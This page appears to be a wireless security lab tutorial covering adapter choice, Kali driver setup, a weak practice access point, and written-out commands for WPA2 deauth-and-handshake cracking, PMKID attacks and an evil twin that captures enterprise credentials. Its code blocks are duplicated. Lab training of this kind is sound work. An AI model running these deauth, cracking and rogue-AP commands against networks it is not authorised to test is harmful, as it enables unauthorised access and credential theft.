⚡ Intermediate
Wireless Testing Lab Setup
Set up a dedicated wireless security testing environment with the right hardware, drivers, and practice access points. Practice WPA2/WPA3 cracking, evil twin attacks, and wireless reconnaissance in a controlled setting.
Legal Warning
Only test wireless networks you own or have explicit written authorization to test.
Unauthorized wireless interception is illegal in most jurisdictions. Always use an
isolated lab environment.
Recommended Wireless Adapters
Not all WiFi adapters support monitor mode and packet injection. These adapters are tested and recommended for penetration testing:
| Adapter | Chipset | Bands | Monitor Mode | Best For |
|---|---|---|---|---|
| Alfa AWUS036AXML | MediaTek MT7921AU | 2.4/5/6 GHz (WiFi 6E) | ✓ | Modern WiFi 6E testing |
| Alfa AWUS036ACH | Realtek RTL8812AU | 2.4/5 GHz (AC) | ✓ | Dual-band, strong range |
| Alfa AWUS036ACM | MediaTek MT7612U | 2.4/5 GHz (AC) | ✓ | Best Linux support, reliable |
| Panda PAU09 | Ralink RT5572 | 2.4/5 GHz (N) | ✓ | Budget option, plug & play |
| TP-Link TL-WN722N v1 | Atheros AR9271 | 2.4 GHz (N) | ✓ | Classic beginner choice (v1 only) |
Version Matters
Many adapters change chipsets between hardware revisions. The TP-Link TL-WN722N v1 uses
Atheros AR9271 (great for pentesting), but v2/v3 use Realtek chips that don't support
monitor mode without patched drivers. Always verify the chipset before purchasing.
Driver Setup on Kali
bash
# Most Alfa adapters work out of the box on Kali
# Update and install wireless tools
sudo apt update && sudo apt install -y \
aircrack-ng \
hcxdumptool \
hcxtools \
hostapd-wpe \
bettercap \
wifite \
mdk4 \
pixiewps \
reaver
# For RTL8812AU chipset (AWUS036ACH) - if not auto-detected
sudo apt install -y realtek-rtl88xxau-dkms
# For MT7921AU chipset (AWUS036AXML / WiFi 6E)
# Requires kernel 5.18+ (Kali 2023.1+)
# Check if kernel supports it:
modinfo mt7921u
# Verify adapter is detected
iwconfig
# Or
iw dev
# Check chipset info
lsusb | grep -i wireless
airmon-ng# Most Alfa adapters work out of the box on Kali
# Update and install wireless tools
sudo apt update && sudo apt install -y \
aircrack-ng \
hcxdumptool \
hcxtools \
hostapd-wpe \
bettercap \
wifite \
mdk4 \
pixiewps \
reaver
# For RTL8812AU chipset (AWUS036ACH) - if not auto-detected
sudo apt install -y realtek-rtl88xxau-dkms
# For MT7921AU chipset (AWUS036AXML / WiFi 6E)
# Requires kernel 5.18+ (Kali 2023.1+)
# Check if kernel supports it:
modinfo mt7921u
# Verify adapter is detected
iwconfig
# Or
iw dev
# Check chipset info
lsusb | grep -i wireless
airmon-ngUSB Passthrough for VMs
If running Kali in a VM, you must pass the USB WiFi adapter through to the guest.
VMware
- VM → Removable Devices → Select adapter
- Click "Connect" to pass through
- Or: VM Settings → USB Controller → Add USB device
- Verify with
lsusbin Kali
VirtualBox
- Install VirtualBox Extension Pack
- Settings → USB → Enable USB 3.0
- Add USB device filter for adapter
- Start VM — adapter auto-attaches
Practice Access Point Setup
Create your own vulnerable access point for testing. Use a second WiFi adapter or a cheap router with OpenWrt for the target AP.
bash
# Install hostapd
sudo apt install -y hostapd dnsmasq
# Create hostapd config for WPA2 AP
cat > /tmp/hostapd.conf << 'EOF'
interface=wlan1 # Use second adapter for AP
driver=nl80211
ssid=PentestLab_AP
channel=6
hw_mode=g
ieee80211n=1
# WPA2 with weak password (for cracking practice)
wpa=2
wpa_passphrase=password123
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
EOF
# Start the access point
sudo hostapd /tmp/hostapd.conf
# In another terminal, set up DHCP for clients
cat > /tmp/dnsmasq.conf << 'EOF'
interface=wlan1
dhcp-range=192.168.100.10,192.168.100.50,12h
server=8.8.8.8
EOF
sudo ifconfig wlan1 192.168.100.1 netmask 255.255.255.0
sudo dnsmasq -C /tmp/dnsmasq.conf# Install hostapd
sudo apt install -y hostapd dnsmasq
# Create hostapd config for WPA2 AP
cat > /tmp/hostapd.conf << 'EOF'
interface=wlan1 # Use second adapter for AP
driver=nl80211
ssid=PentestLab_AP
channel=6
hw_mode=g
ieee80211n=1
# WPA2 with weak password (for cracking practice)
wpa=2
wpa_passphrase=password123
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
EOF
# Start the access point
sudo hostapd /tmp/hostapd.conf
# In another terminal, set up DHCP for clients
cat > /tmp/dnsmasq.conf << 'EOF'
interface=wlan1
dhcp-range=192.168.100.10,192.168.100.50,12h
server=8.8.8.8
EOF
sudo ifconfig wlan1 192.168.100.1 netmask 255.255.255.0
sudo dnsmasq -C /tmp/dnsmasq.confWPA2 Cracking Exercise
bash
# Step 1: Enable monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Step 2: Scan for target AP
sudo airodump-ng wlan0mon
# Step 3: Capture handshake from target AP
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Step 4: Deauth a client to force re-authentication (in new terminal)
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# Wait for "WPA handshake" in airodump output
# Step 5: Crack with wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Alternative: Use hashcat for GPU acceleration
# Convert capture to hashcat format
hcxpcapngtool -o hash.hc22000 capture-01.cap
# Crack with hashcat
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt# Step 1: Enable monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Step 2: Scan for target AP
sudo airodump-ng wlan0mon
# Step 3: Capture handshake from target AP
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Step 4: Deauth a client to force re-authentication (in new terminal)
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# Wait for "WPA handshake" in airodump output
# Step 5: Crack with wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Alternative: Use hashcat for GPU acceleration
# Convert capture to hashcat format
hcxpcapngtool -o hash.hc22000 capture-01.cap
# Crack with hashcat
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txtModern Attacks: PMKID & WPA3
bash
# PMKID attack doesn't require deauthing any clients
# Use hcxdumptool to capture PMKID
# Capture PMKID from target AP
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --filterlist_ap=targets.txt --filtermode=2
# Convert to hashcat format
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng
# Crack with hashcat
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt# PMKID attack doesn't require deauthing any clients
# Use hcxdumptool to capture PMKID
# Capture PMKID from target AP
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --filterlist_ap=targets.txt --filtermode=2
# Convert to hashcat format
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng
# Crack with hashcat
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txtWPA3 Testing
WPA3-SAE is resistant to offline dictionary attacks, but transition mode (WPA2/WPA3 mixed)
may still be vulnerable to downgrade attacks. Use Dragonblood tools to test
WPA3-SAE implementations. Note: WPA3 testing requires adapters supporting SAE (WiFi 6/6E adapters).
Evil Twin Attack Lab
bash
# hostapd-wpe creates a rogue AP for credential capture
# Useful for WPA-Enterprise (802.1X) attacks
# Configure hostapd-wpe
sudo nano /etc/hostapd-wpe/hostapd-wpe.conf
# Set: ssid=CorpWiFi (match target SSID)
# Set: interface=wlan0
# Set: channel=6
# Start evil twin
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
# Captured credentials appear in the terminal
# MSCHAPV2 hashes can be cracked with asleap or hashcat
# Alternative: Use bettercap for automated evil twin
sudo bettercap -iface wlan0mon
# In bettercap:
# > wifi.recon on
# > wifi.deauth AA:BB:CC:DD:EE:FF
# > wifi.ap# hostapd-wpe creates a rogue AP for credential capture
# Useful for WPA-Enterprise (802.1X) attacks
# Configure hostapd-wpe
sudo nano /etc/hostapd-wpe/hostapd-wpe.conf
# Set: ssid=CorpWiFi (match target SSID)
# Set: interface=wlan0
# Set: channel=6
# Start evil twin
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
# Captured credentials appear in the terminal
# MSCHAPV2 hashes can be cracked with asleap or hashcat
# Alternative: Use bettercap for automated evil twin
sudo bettercap -iface wlan0mon
# In bettercap:
# > wifi.recon on
# > wifi.deauth AA:BB:CC:DD:EE:FF
# > wifi.apTroubleshooting FAQ
Adapter not detected in Kali VM
- Ensure USB passthrough is enabled (see VM setup section above)
- Check
lsusb— adapter should appear in the list - Try a different USB port (USB 2.0 vs 3.0 can matter)
- Install VirtualBox Extension Pack for USB 3.0 support
- Reboot the VM after connecting the adapter
Monitor mode fails or "device busy"
- Kill interfering processes first:
sudo airmon-ng check kill - Disable NetworkManager for wifi:
sudo systemctl stop NetworkManager - Try manual mode:
sudo ip link set wlan0 down && sudo iw dev wlan0 set type monitor && sudo ip link set wlan0 up - Some chipsets need patched drivers — check the adapter's GitHub issues
No handshake captured after deauth
- Ensure you're on the correct channel — match the target AP's channel
- Get closer to the AP and client for better signal
- Try targeting specific clients:
aireplay-ng -0 5 -a AP_BSSID -c CLIENT_MAC wlan0mon - Some clients don't auto-reconnect — try multiple deauths with pauses
- Use PMKID attack instead (doesn't need active clients)
5 GHz networks not showing up
- Verify adapter supports 5 GHz:
iw phy | grep -A 20 "Frequencies" - Scan both bands:
sudo airodump-ng --band abg wlan0mon - Regulatory domain may limit channels:
sudo iw reg set US - Some 2.4 GHz-only adapters (like TL-WN722N) won't see 5 GHz networks